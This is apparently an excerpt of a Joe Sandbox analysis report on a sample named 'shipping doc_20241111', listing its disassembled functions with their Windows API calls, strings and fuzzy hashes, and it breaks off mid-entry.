Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 802886cb0f2d8805c0410f7f03ae8c31b54d5de0e3a03a867d632b0e0a5e3d86
Instruction ID: 2fe6e7107f10aba93b9a777d556e3fd08f249fb9397dcffac66b384fae3d5155
Opcode Fuzzy Hash: 802886cb0f2d8805c0410f7f03ae8c31b54d5de0e3a03a867d632b0e0a5e3d86
Instruction Fuzzy Hash: C051D4E0A047D53EFB3283348C55B767EA96B07321F088989E0D5468D2D795EC8CF752

Function 00F753BE Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00F75B33,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00F75400
__fassign.LIBCMT ref: 00F7547B
__fassign.LIBCMT ref: 00F75496
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00F754BC
WriteFile.KERNEL32(?,FF8BC35D,00000000,00F75B33,00000000,?,?,?,?,?,?,?,?,?,00F75B33,?), ref: 00F754DB
WriteFile.KERNEL32(?,?,00000001,00F75B33,00000000,?,?,?,?,?,?,?,?,?,00F75B33,?), ref: 00F75514

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3dfe8c77dc9b22a596b5f69ef0ab4b6a5a848cdf9020968b15171a45b5daf467
Instruction ID: 67673361cc9cf8e6ee8a4dc48eebb1f00fc82c6ef7088e6f2cf7a825b1b9ee92
Opcode Fuzzy Hash: 3dfe8c77dc9b22a596b5f69ef0ab4b6a5a848cdf9020968b15171a45b5daf467
Instruction Fuzzy Hash: C0510371E00249AFCB10CFA8D841AEEBBFAEF08710F14815FE559E3291E7719A41DB61

Function 00F9725A Relevance: 10.6, APIs: 7, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e6df679dcb207fed2c4723fb10600d607317ee4f8f604106edd58cd22eab3e8
Instruction ID: b2b38d8f3df66a5ac8045d61c2f5808d0a8fdd9590f0bca5812dd7d2e0efcb2f
Opcode Fuzzy Hash: 2e6df679dcb207fed2c4723fb10600d607317ee4f8f604106edd58cd22eab3e8
Instruction Fuzzy Hash: 0041CA71A28349EFEF21DF34CC96BAA7BA1EF45320F10425AF981861D0C330E815EB42

Function 00F5EA9A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F5EAAE
ScreenToClient.USER32(?,?), ref: 00F5EACB
GetAsyncKeyState.USER32(00000001), ref: 00F5EB02
GetAsyncKeyState.USER32(00000002), ref: 00F5EB1C

Strings

_______________________________________________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvw, xrefs: 00F9EF64

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: _______________________________________________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvw
API String ID: 4210589936-2282388625
Opcode ID: 6e35df8927ecc7b5e309996fa3a3443918e8132a8079acbd041f4a5c841ca068
Instruction ID: feec01116aac504a372def0ce039c57c5a81e8d663ccb05fee82f138b45c8e2a
Opcode Fuzzy Hash: 6e35df8927ecc7b5e309996fa3a3443918e8132a8079acbd041f4a5c841ca068
Instruction Fuzzy Hash: 2F41C131A0850ABFDF18DF68C844BEEB771FF44324F24421AE825A32D0D7746A54EB91

Function 00F62CB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00F62CDB
___except_validate_context_record.LIBVCRUNTIME ref: 00F62CE3
_ValidateLocalCookies.LIBCMT ref: 00F62D71
__IsNonwritableInCurrentImage.LIBCMT ref: 00F62D9C
_ValidateLocalCookies.LIBCMT ref: 00F62DF1

Strings

csm, xrefs: 00F62D86

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f3c4f2790e2dd2df21f4e0bb00fb6183c8d687b444a83a39defd0c3dbe12cb5e
Instruction ID: 9f6d632c2bb62309dbe01e4e59110581f1c29da9017f1087a6aad53e31033701
Opcode Fuzzy Hash: f3c4f2790e2dd2df21f4e0bb00fb6183c8d687b444a83a39defd0c3dbe12cb5e
Instruction Fuzzy Hash: C641CF35E00609ABCF50DF68CC84AEEBBB5BF45324F148165F814AB392D735AA01EBD0

Function 00FC0FDF Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC2F75: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FC2FA1
Part of subcall function 00FC2F75: _wcslen.LIBCMT ref: 00FC2FC2

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00FC1039
WSAGetLastError.WSOCK32 ref: 00FC1048
WSAGetLastError.WSOCK32 ref: 00FC10F0
closesocket.WSOCK32(00000000), ref: 00FC1120

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 338cc21a3d06c717544b6885ea6a9ca4f3fd2796aeaceeaa6bc9644e6faeea48
Instruction ID: fc8479025fd3d80767b15d0cdfe57604449744576ba780ff16723026f1ca14c4
Opcode Fuzzy Hash: 338cc21a3d06c717544b6885ea6a9ca4f3fd2796aeaceeaa6bc9644e6faeea48
Instruction Fuzzy Hash: 1141173160010AAFDB109F24C946FA9BBEAFF46364F14811DFC059B292C775AD81EBE1

Function 00FACE1E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FADCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FACE40,?), ref: 00FADD1B

Part of subcall function 00FADCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FACE40,?), ref: 00FADD34

lstrcmpiW.KERNEL32(?,?), ref: 00FACE63
MoveFileW.KERNEL32(?,?), ref: 00FACE9D
_wcslen.LIBCMT ref: 00FACF23
_wcslen.LIBCMT ref: 00FACF39
SHFileOperationW.SHELL32(?), ref: 00FACF7F

Strings

\*.*, xrefs: 00FACF11

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 62e9d8bac79f4cb36c08dc376bcf675b850a9bd672ea881ff204ea54a7704b81
Instruction ID: 5f872c44f1e2636d4643358ba4957a2bf9ad95d7d53bd6b27378202db2369534
Opcode Fuzzy Hash: 62e9d8bac79f4cb36c08dc376bcf675b850a9bd672ea881ff204ea54a7704b81
Instruction Fuzzy Hash: 6E4153B2D452195EDF12EBA4DD81BDE77B9AF09390F0000E6E505EB142EB74AB84DB90

Function 00FD2D30 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FD2D4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00FD2D82
GetWindowLongW.USER32(00000000,000000F0), ref: 00FD2DB7
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00FD2DE9
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00FD2E13
GetWindowLongW.USER32(00000000,000000F0), ref: 00FD2E24
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FD2E3E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: de1d604fb456aa74146591ad750f05e99b4eb54cad4f89b0ed329e9cb34fd5fc
Instruction ID: 31ee2b764dc701917cc1ed015137a03e4619cca4d147921670d44fb77a327e24
Opcode Fuzzy Hash: de1d604fb456aa74146591ad750f05e99b4eb54cad4f89b0ed329e9cb34fd5fc
Instruction Fuzzy Hash: 62313731A45245AFDB60CF28DC84F6437E3FB5A720F1901A6F6548F2A2CB75E840EB90

Function 00FA767C Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FA76BF
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FA76E5
SysAllocString.OLEAUT32(00000000), ref: 00FA76E8
SysAllocString.OLEAUT32(?), ref: 00FA7706
SysFreeString.OLEAUT32(?), ref: 00FA770F
StringFromGUID2.OLE32(?,?,00000028), ref: 00FA7734
SysAllocString.OLEAUT32(?), ref: 00FA7742

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 67b11e4cb01bf03abd12dd6a54779d3b6b3ba318e588b7a294d47fe9d4a831ec
Instruction ID: 4c0f0487d657dc1c73f6a9ec0dacffbdd8cc0919e6eec651a52279662677604a
Opcode Fuzzy Hash: 67b11e4cb01bf03abd12dd6a54779d3b6b3ba318e588b7a294d47fe9d4a831ec
Instruction Fuzzy Hash: C621B776605319AFDB00EFB9CC44DBB73ADEB0A3607048125F905DB150D670DC45D760

Function 00FA7753 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FA7798
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FA77BE
SysAllocString.OLEAUT32(00000000), ref: 00FA77C1
SysAllocString.OLEAUT32 ref: 00FA77E2
SysFreeString.OLEAUT32 ref: 00FA77EB
StringFromGUID2.OLE32(?,?,00000028), ref: 00FA7805
SysAllocString.OLEAUT32(?), ref: 00FA7813

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 12a0b448030f8fe10082b105703e608ceac26a478a57c1ae324b5c01e6494a7a
Instruction ID: 704c05dfee8efb2e36bf631b68dcfa72d19a2efef53c0e0bc08903211af25892
Opcode Fuzzy Hash: 12a0b448030f8fe10082b105703e608ceac26a478a57c1ae324b5c01e6494a7a
Instruction Fuzzy Hash: 7221D876609219AF9B10EFB8CC88DBA77EDEF0A3607108125F904CB1A0D674DC41EB64

Function 00FB03F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00FB0410
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FB044C

Strings

nul, xrefs: 00FB0485

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 90d1e8203bbf4bcec771d0d5004e0d83c9e0d7df3899f08886c6bb3eb8c4ca96
Instruction ID: d8414588bf81607ef25a3bc5fbcfd5f76992d44f7cf50f053a426af2b7f1d6e0
Opcode Fuzzy Hash: 90d1e8203bbf4bcec771d0d5004e0d83c9e0d7df3899f08886c6bb3eb8c4ca96
Instruction Fuzzy Hash: 95213D7590030AEBDB20DF6ADC05ADA77A4FF55724F204A19FAA1D72D0DBB09850EF50

Function 00FB04C5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00FB04E4
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FB051F

Strings

nul, xrefs: 00FB0557

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 7f98884eafdf99d9759f1a1e350fae9e54556dc7ba2b27be15a725203b635794
Instruction ID: 66abd2d49d22e356fac092eefd7580c5ca7912790c44ce07f8bcde3f4d9ce475
Opcode Fuzzy Hash: 7f98884eafdf99d9759f1a1e350fae9e54556dc7ba2b27be15a725203b635794
Instruction Fuzzy Hash: 9D213B759003169BDB309F6A9C04ADA77E9AF55734F240A19FCA1E72D0DB709940EF60

Function 00F7D77F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F7D743: _free.LIBCMT ref: 00F7D76C

_free.LIBCMT ref: 00F7D7CD

Part of subcall function 00F72958: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000), ref: 00F7296E
Part of subcall function 00F72958: GetLastError.KERNEL32(00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000,00000000), ref: 00F72980

_free.LIBCMT ref: 00F7D7D8
_free.LIBCMT ref: 00F7D7E3
_free.LIBCMT ref: 00F7D837
_free.LIBCMT ref: 00F7D842
_free.LIBCMT ref: 00F7D84D
_free.LIBCMT ref: 00F7D858

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: dfa9ebf045b5f7844faa2ba3869b151e5aa6910f70d9e574c369df231f31c5be
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 35118471680744A6D921BB71CC0BFCBB7FC6F40740F848816F39DA6092D628B6467752

Function 00FAD978 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FAD992
LoadStringW.USER32(00000000), ref: 00FAD999
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FAD9AF
LoadStringW.USER32(00000000), ref: 00FAD9B6
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FAD9FA

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00FAD9D7

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: c3e598f025dc1a0642a51f3959444cffe1fd03b239ed128bcf1b004c941928a7
Instruction ID: 265aaecabef46c03f68fc8cda79851aa2dfe79ca9e6855924c9f625160f09d56
Opcode Fuzzy Hash: c3e598f025dc1a0642a51f3959444cffe1fd03b239ed128bcf1b004c941928a7
Instruction Fuzzy Hash: 320162F690020D7FEB119BA48D89EE7336DD708700F000497B756E6041EA749E84AF74

Function 00FB0889 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00FB0899
EnterCriticalSection.KERNEL32(00000000,?), ref: 00FB08AB
TerminateThread.KERNEL32(00000000,000001F6), ref: 00FB08B9
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FB08C7
CloseHandle.KERNEL32(00000000), ref: 00FB08D6
InterlockedExchange.KERNEL32(?,000001F6), ref: 00FB08E6
LeaveCriticalSection.KERNEL32(00000000), ref: 00FB08ED

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: fc8bbd57e5487e49289f9790cfdbf4723a9af7f515387615a28b5f5679c7495a
Instruction ID: c48041a7928aa93c7f66605fa386ca89b89dbf226491e96cb0521f1a50b30727
Opcode Fuzzy Hash: fc8bbd57e5487e49289f9790cfdbf4723a9af7f515387615a28b5f5679c7495a
Instruction Fuzzy Hash: 40F0E131483617BBD7411FA4ED4DBD67B36FF05712F401522F101508608B749561EFD0

Function 00F70147 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00F7004A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F70066
__allrem.LIBCMT ref: 00F7007D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F7009B
__allrem.LIBCMT ref: 00F700B2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F700D0

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f34cbcdfc8d62fc6f68ef1ef0b42743a3754587d6c921e2558e517bac15b21f9
Instruction ID: 3b9ada3cd2d79dd02a0e3859b57f009391bbee9b07de8b24bd9a23fee2cb4b8c
Opcode Fuzzy Hash: f34cbcdfc8d62fc6f68ef1ef0b42743a3754587d6c921e2558e517bac15b21f9
Instruction Fuzzy Hash: FD812872A00706DBD720AA78DC41B6A73E9AF45374F24823FF515D6281EBB4E905A781

Function 00FC1C37 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC3070: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00FC0F43,00000000,?,?,00000000), ref: 00FC30BC

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00FC1CE7
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00FC1D08
WSAGetLastError.WSOCK32 ref: 00FC1D19
inet_ntoa.WSOCK32(?), ref: 00FC1DB3
htons.WSOCK32(?,?,?,?,?), ref: 00FC1E02
_strlen.LIBCMT ref: 00FC1E5C

Part of subcall function 00FA3930: _strlen.LIBCMT ref: 00FA393A

Part of subcall function 00F48725: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00F5D6D4,?,?,?), ref: 00F48741
